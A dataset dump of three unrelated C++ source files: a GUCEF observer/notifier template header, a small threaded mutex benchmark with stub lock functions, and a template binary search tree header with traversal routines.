] | permissive | LiberatorUSA/GUCEF | b579a530ac40478e8d92d8c1688dce71634ec004 | 2f24399949bc2b2eb20b3f445100dd3e141fe6d5 | refs/heads/master | 2023-09-03T18:05:25.190918 | 2023-09-02T17:23:59 | 2023-09-02T17:23:59 | 24,012,676 | 9 | 15 | Apache-2.0 | 2021-07-04T04:53:42 | 2014-09-14T03:30:46 | C++ | UTF-8 | C++ | false | false | 13,625 | h | CTObservingNotifierExpansion.h | /*
* gucefCORE: GUCEF module providing O/S abstraction and generic solutions
* Copyright (C) 2002 - 2007. Dinand Vanvelzen
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#ifndef GUCEF_CORE_CTOBSERVINGNOTIFIEREXPANSION_H
#define GUCEF_CORE_CTOBSERVINGNOTIFIEREXPANSION_H
/*-------------------------------------------------------------------------//
// //
// INCLUDES //
// //
//-------------------------------------------------------------------------*/
#ifndef GUCEF_CORE_CIOBSERVER_H
#include "gucefCORE_CIObserver.h"
#define GUCEF_CORE_CIOBSERVER_H
#endif /* GUCEF_CORE_CIOBSERVER_H ? */
#include "CTObservingNotifierComponent.h"
/*-------------------------------------------------------------------------//
// //
// NAMESPACE //
// //
//-------------------------------------------------------------------------*/
namespace GUCEF {
namespace CORE {
/*-------------------------------------------------------------------------//
// //
// CLASSES //
// //
//-------------------------------------------------------------------------*/
/**
* Class that allows you to add notification to any class with ease.
* Creates a compound class relationship for you that gives you the notification system
* combined with the chosen base class without having to resort to multiple inheritance
* The template argument is a base-class that will be expanded with
* notification capabilities.
*/
template < class BaseClass >
class CTObservingNotifierExpansion : public BaseClass ,
public virtual CIObserver
{
public:
CTObservingNotifierExpansion( void );
CTObservingNotifierExpansion( const CTObservingNotifierExpansion& src );
virtual ~CTObservingNotifierExpansion();
CTObservingNotifierExpansion& operator=( const CTObservingNotifierExpansion& src );
/**
* Provides mutable access to the notifier capabilities of your class
*/
CNotifier& AsNotifier( void );
/**
* Provides read-only access to the notifier capabilities of your class
*/
const CNotifier& AsNotifier( void ) const;
/**
* Provides mutable access to the observer capabilities of your class
*/
CObserver& AsObserver( void );
/**
* Provides read-only access to the observer capabilities of your class
*/
const CObserver& AsObserver( void ) const;
virtual const CString& GetClassTypeName( void ) const GUCEF_VIRTUAL_OVERRIDE;
virtual const MT::CILockable* AsLockable( void ) const GUCEF_VIRTUAL_OVERRIDE;
protected:
typedef CTObservingNotifierExpansion< BaseClass > TONExpansion;
friend class CTObservingNotifierComponent< TONExpansion >;
/**
* Event callback member function.
* Implement this in your descending class to handle
* notification events.
*
* @param notifier the notifier that sent the notification
* @param eventid the unique event id for an event
* @param eventdata optional notifier defined userdata
*/
virtual void OnNotify( CNotifier* notifier ,
const CEvent& eventid ,
CICloneable* eventdata = GUCEF_NULL ) GUCEF_VIRTUAL_OVERRIDE;
/**
* Dispatches the standard CNotifier::ModifyEvent
* Useful for a notification system where you only care if
* a mutation is performed on an object.
*
* @return Alive state of the notifier, if false then the notifier died itself as a result of the notification.
*/
bool NotifyObservers( void );
/**
* Dispatches the given eventid and eventData to all observers
* that are subscribed to all events and the observers that are subscribed
* to this specific eventid.
*
* Note that the calling thread is the one in which the observer OnNotify
* event handlers will be processed. Keep this in mind when notification
* occurs across thread boundaries.
*
* Note that eventData is not copied. So when passing data across threads
* consider allocating a copy and passing that in as the data argument.
*
* @return Alive state of the notifier, if false then the notifier died itself as a result of the notification.
*/
bool NotifyObservers( const CEvent& eventid ,
CICloneable* eventData = GUCEF_NULL );
/**
* The same as NotifyObservers( CEvent, CICloneable )
* except that this allows you to specify the sender yourself.
* You will basically be faking an event emitted at the given sender.
*
* Use with great care !!!
* Use of this version should be an exception and not standard practice
*
* @return Alive state of the notifier, if false then the notifier died itself as a result of the notification.
*/
bool NotifyObservers( CNotifier& sender ,
const CEvent& eventid ,
CICloneable* eventData = GUCEF_NULL );
protected:
virtual MT::TLockStatus Lock( UInt32 lockWaitTimeoutInMs = GUCEF_MT_DEFAULT_LOCK_TIMEOUT_IN_MS ) const GUCEF_VIRTUAL_OVERRIDE;
virtual MT::TLockStatus Unlock( void ) const GUCEF_VIRTUAL_OVERRIDE;
private:
typedef CTObservingNotifierComponent< TONExpansion > TObservingNotifierComponent;
TObservingNotifierComponent m_notificationComponent; /**< the notification component that houses the actual mechanisms */
};
/*-------------------------------------------------------------------------//
// //
// UTILITIES //
// //
//-------------------------------------------------------------------------*/
template < class BaseClass >
CTObservingNotifierExpansion< BaseClass >::CTObservingNotifierExpansion( void )
: BaseClass() ,
m_notificationComponent()
{GUCEF_TRACE;
m_notificationComponent.SetOwner( this );
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
CTObservingNotifierExpansion< BaseClass >::CTObservingNotifierExpansion( const CTObservingNotifierExpansion& src )
: BaseClass( src ) ,
m_notificationComponent()
{GUCEF_TRACE;
m_notificationComponent.SetOwner( this );
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
CTObservingNotifierExpansion< BaseClass >::~CTObservingNotifierExpansion()
{GUCEF_TRACE;
m_notificationComponent.UnsubscribeAllFromObserver();
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
CTObservingNotifierExpansion< BaseClass >&
CTObservingNotifierExpansion< BaseClass >::operator=( const CTObservingNotifierExpansion< BaseClass >& src )
{GUCEF_TRACE;
BaseClass::operator=( src );
if ( &src != this )
{
m_notificationComponent = src.m_notificationComponent;
}
return *this;
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
const CString&
CTObservingNotifierExpansion< BaseClass >::GetClassTypeName( void ) const
{GUCEF_TRACE;
static const CString typeName = "GUCEF::CORE::CTObservingNotifierExpansion< BaseClass >";
return typeName;
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
CObserver&
CTObservingNotifierExpansion< BaseClass >::AsObserver( void )
{GUCEF_TRACE;
return m_notificationComponent.AsObserver();
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
const CObserver&
CTObservingNotifierExpansion< BaseClass >::AsObserver( void ) const
{GUCEF_TRACE;
return m_notificationComponent.AsObserver();
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
CNotifier&
CTObservingNotifierExpansion< BaseClass >::AsNotifier( void )
{GUCEF_TRACE;
return m_notificationComponent;
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
const CNotifier&
CTObservingNotifierExpansion< BaseClass >::AsNotifier( void ) const
{GUCEF_TRACE;
return m_notificationComponent;
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
bool
CTObservingNotifierExpansion< BaseClass >::NotifyObservers( void )
{GUCEF_TRACE;
return m_notificationComponent.DoNotifyObservers();
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
bool
CTObservingNotifierExpansion< BaseClass >::NotifyObservers( const CEvent& eventid ,
CICloneable* eventData /* = NULL */ )
{GUCEF_TRACE;
return m_notificationComponent.DoNotifyObservers( eventid ,
eventData );
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
bool
CTObservingNotifierExpansion< BaseClass >::NotifyObservers( CNotifier& sender ,
const CEvent& eventid ,
CICloneable* eventData /* = NULL */ )
{GUCEF_TRACE;
return m_notificationComponent.DoNotifyObservers( sender ,
eventid ,
eventData );
}
/*-------------------------------------------------------------------------*/
template < class BaseClass >
void
CTObservingNotifierExpansion< BaseClass >::OnNotify( CNotifier* /* notifier */ ,
const CEvent& /* eventid */ ,
CICloneable* /* eventdata *//* = NULL */ )
{GUCEF_TRACE;
/* implemented to avoid mandatory implementation by descending classes */
}
/*-------------------------------------------------------------------------*/
template< class BaseClass >
const MT::CILockable*
CTObservingNotifierExpansion< BaseClass >::AsLockable( void ) const
{GUCEF_TRACE;
return static_cast< const BaseClass* >( this );
}
/*-------------------------------------------------------------------------*/
template< class BaseClass >
MT::TLockStatus
CTObservingNotifierExpansion< BaseClass >::Lock( UInt32 lockWaitTimeoutInMs ) const
{GUCEF_TRACE;
/* implemented to avoid mandatory implementation by descending classes */
return MT::LOCKSTATUS_NOT_APPLICABLE;
}
/*-------------------------------------------------------------------------*/
template< class BaseClass >
MT::TLockStatus
CTObservingNotifierExpansion< BaseClass >::Unlock( void ) const
{GUCEF_TRACE;
/* implemented to avoid mandatory implementation by descending classes */
return MT::LOCKSTATUS_NOT_APPLICABLE;
}
/*-------------------------------------------------------------------------//
// //
// NAMESPACE //
// //
//-------------------------------------------------------------------------*/
}; /* namespace CORE */
}; /* namespace GUCEF */
/*-------------------------------------------------------------------------*/
#endif /* GUCEF_CORE_CTOBSERVINGNOTIFIEREXPANSION_H ? */
|
12d2c380a985f1c32155e2054ad0d41c69d91c2d | 4d25f97358a9d394c50d2969ac2b3525023ed12a | /mutex/mutex.cpp | 7e5b0792c4fef8475affd21fd458d5b801f53f17 | [] | no_license | robryk/www10 | 11b092b45ed5f77686ec2812cd31b533d8dc96f6 | af9d4ac9566e15a6b5c6f48496d4ef1eea5b9d3b | refs/heads/master | 2016-09-06T00:26:52.219202 | 2014-08-21T07:57:53 | 2014-08-21T07:57:53 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 662 | cpp | mutex.cpp | #include <thread>
#include <mutex>
#include <iostream>
#include "bench.h"
#include <cassert>
using namespace std;
void init() {
}
void lock() {
}
void unlock() {
}
std::atomic<int> tester;
void bench_thread(B* b) {
while (!b->should_stop()) {
lock();
assert(tester.exchange(1) == 0);
tester.store(0);
unlock();
b->inc();
}
}
void bench_mutex(int n_threads) {
thread thr[n_threads];
B b;
init();
for(int i=0;i<n_threads;i++)
thr[i] = thread(&bench_thread, &b);
for(int i=0;i<n_threads;i++)
thr[i].join();
cout << n_threads << " threads - " << b.report() << " ops/us\n";
}
int main() {
bench_mutex(1);
bench_mutex(2);
return 0;
}
|
ad5ef3a7ecb07a7da2c021583a94c648f9af554c | a672db4c69d951812281269d944cffd2c81c4662 | /Templatetree/TemplateTree.h | d455ba1d5d8306451e757441239ade2fd81f4af1 | [] | no_license | screenleon/C-plus | c0a6d7233b816109efe7fdf53d15754422bce2de | d502a66bb5d30fbf51fa424dfbd93eb7a77dc3dc | refs/heads/master | 2021-01-12T06:17:18.888750 | 2020-01-16T05:46:22 | 2020-01-16T05:46:22 | 77,331,513 | 0 | 0 | null | null | null | null | BIG5 | C++ | false | false | 1,853 | h | TemplateTree.h | #ifndef TEMPLATETREE.H
#define TEMPLATETREE.H
#include <iostream>
#include <cstring>
using namespace std;
struct book{
char * bookName; //書名當成 key 來比較大小
char * authors;
int price;
};
int compareFun(book, book);
inline void printFun(book);
int compareFun(int a, int b); //比較int資料大小
int compareFun(float a, float b); //比較float資料大小
void printFun(int a);
void printFun(float a);
void Instruction(void);
void VersionInstruction(void);
void Version1(void);
void Version2(void);
void Version3(void);
template<typename T>
struct treeNodeTP {
struct treeNodeTP *leftPtr;
T data;
struct treeNodeTP *rightPtr;
};
template<typename T>
void insertNodeTP ( treeNodeTP<T> * &treePtr, T value ){
if(treePtr == NULL){
treeNodeTP<T> * Temp = new treeNodeTP<T>;
Temp->data = value;
InitialLink(Temp);
treePtr = Temp;
return;
}
if(compareFun(treePtr->data, value)){
insertNodeTP(treePtr->rightPtr, value);
}else{
insertNodeTP(treePtr->leftPtr, value);
}
}
template<typename T>
void inOrderTP ( treeNodeTP<T> * treePtr ){
if(treePtr == NULL)return;
inOrderTP(treePtr->leftPtr);
printFun(treePtr->data);
inOrderTP(treePtr->rightPtr);
return;
}
template<typename T>
void preOrderTP ( treeNodeTP<T> * treePtr ){
if(treePtr == NULL)return;
printFun(treePtr->data);
preOrderTP(treePtr->leftPtr);
preOrderTP(treePtr->rightPtr);
return;
}
template<typename T>
void postOrderTP ( treeNodeTP<T> * treePtr ){
if(treePtr == NULL)return;
postOrderTP(treePtr->leftPtr);
postOrderTP(treePtr->rightPtr);
printFun(treePtr->data);
return;
}
template<typename T>
void InitialLink(treeNodeTP<T> * &treeptr){
treeptr->leftPtr = NULL;
treeptr->rightPtr = NULL;
}
#endif // TEMPLATETREE
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.